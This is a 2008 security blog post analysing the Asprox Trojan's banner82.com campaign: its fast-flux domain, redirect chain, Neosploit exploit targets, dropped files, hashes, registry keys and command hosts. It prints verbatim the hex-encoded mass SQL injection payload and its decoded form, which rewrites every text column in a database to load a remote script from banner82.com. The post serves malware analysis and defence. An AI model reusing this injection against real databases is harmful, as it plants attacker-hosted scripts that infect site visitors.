Monday, May 19, 2008

Asprox Trojan and banner82.com

On May 19, 2008 Dancho Danchev discussed fast-fluxing SQL injections this time involving the domain banner82.com. The banner82.com SQL injection attacks are similar to the previous direct84.com injections, but there are some slight differences.

SQL Injection Attack:

DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522838303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E62616E6E657238322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461655F437572736F72 AS
VARCHAR(4000));EXEC(@S);--


Decodes to:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''script src=http: //www[dot]banner82[dot]com/b.js script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Tae_Cursor

The user-agent for the injection was: Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1; .NET CLR 2.0.50727)

Banner82.com Domain
As reported by Danchev, the domain uses fast-flux technology (double-flux) with a rotating pool of proxy peer and DNS IP addresses. A small sample during analysis revealed:

24.126.130.229
67.167.252.180
69.247.201.61
71.81.34.118
74.129.121.181
75.118.8.92
78.92.76.30
89.170.16.252
99.151.145.10
99.254.31.140

Banner82.com Site
The b.js file may redirect to malicious code at a varitiey of locations. A sample analysis revealed the following.

injected script: http: //www[dot]banner82[dot]com/b.js

b.js returned an iframe redirect to: http: //banner82[dot]com/cgi-bin/index.cgi?ad

http: //banner82[dot]com/cgi-bin/index.cgi?ad returned a location redirect to: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox

http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox returned two layers of obfuscated code (callee.toString() + location.href)

The result is script a redirect to http: //66[dot]199[dot]242.[dot].26 /cgi-bin/index.cgi?ad75d33b00000258007e11f339060000000002e547d1afff02656e2d75730000000000

(the string characters vary with each connection)

Two more layers of obfuscated code (callee.toString() + location.href) reveal Neosploit generated exploit code targeted at the following vulnerabilities:

MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)
AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability (CVE-2006-5820)
GOM Player GOM Manager ActiveX Control Buffer Overflow (CVE-2007-5779)
CA Products DSM ListCtrl ActiveX Control Code Execution Vulnerability (CVE-2008-1472)
Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability (CVE-2007-0059)
Heap-based buffer overflow in DirectAnimation.PathControl COM object (CVE-2006-4446)

The payload was a request for the binary file: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?ad75d33b00000258027e11f339060000000002e547d1e60002040900000000020

Malware Analysis:
The payload was saved as "index"

Filename: (index.exe) – long string of characters
MD5: 60b9fbb8ba14171cd5d3d1fd86ddd564
Size: 48.0 KB (49,152 bytes)

The malware made the following connection to retrieve common.bin (spam instructions) and cmdexe.bin (SQL injection tool msscntr32.exe)

POST /forum.php HTTP/1.1
Host: 66[dot]199[dot]241[dot]98

POST /forum_asp.php HTTP/1.1
Host: 66[dot]197[dot]168[dot]5

The "index" malware searches for installations of CuteFTP and WS_FTP. The following files were created:

C:\WINDOWS\System32\aspimgr.exe Trojan.Asprox (Symantec)
C:\WINDOWS\s32.txt
C:\WINDOWS\System32\msscntr32.exe

Filename: aspimgr.exe
MD5: bb0c22f33cbf8be8a264e96ef6895ce4
Size: 72.0 KB (73,728 bytes)

Filename: msscntr32.exe
MD5: 30afb898ba27e925f41eab9e68b62833
Size: 20.0 KB (20,480 bytes)

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {056B8C51-1B27-4D61-81CA-66EA278842B7}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "DisplayName"
Type: REG_SZ
Data: Microsoft Security Center Extension
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\msscntr32.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_MSSCENTER\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00


The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to \"ns.uk2.net\" on port 53 (IP)
* Connects to \"www.yahoo.com\" on port 80 (IP)
* Connects to \"www.web.de\" on port 80 (IP)

The Asprox malware generated phishing emails related to "NatWest OnLine Banking"